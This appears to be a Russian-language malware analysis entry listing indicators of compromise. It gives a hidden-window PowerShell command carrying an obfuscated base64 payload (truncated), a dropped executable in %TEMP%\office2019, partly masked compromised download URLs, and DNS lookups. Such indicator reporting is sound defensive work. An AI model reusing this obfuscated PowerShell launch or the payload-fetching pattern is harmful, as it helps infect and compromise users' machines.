Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\qioopg5m.exe
- %TEMP%\office2019\qioopg5m.exe
- http://zm###dia.com/cgi-bin/wd/
- http://mo####riatrics.com/wp-admin/9s/
- http://sr#######eswarainfratech.com/temp/jUl/
- http://pa#####balschool.com/wp-content/j/
- http://lo###nthego.com/cgi-bin/6/
- http://pa#####nenterprise.com/wp-includes/6Sw/
- DNS ASK zm###dia.com
- DNS ASK mo####riatrics.com
- DNS ASK sr#######eswarainfratech.com
- DNS ASK pa#####balschool.com
- DNS ASK lo###nthego.com
- DNS ASK pa#####nenterprise.com
- DNS ASK sa###erv.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABYAHUAMQAwAHQANABxAD0AKAAnAFAAcwAnACsAJwAxAGUAdwBtACcAKwAnAGEAJwApADsALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBpAHQAZQBtACcAKQAgACQAZQBuAFYAOgB0AEUAbQBQAFwAbwBmAGYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AG...' (со скрытым окном)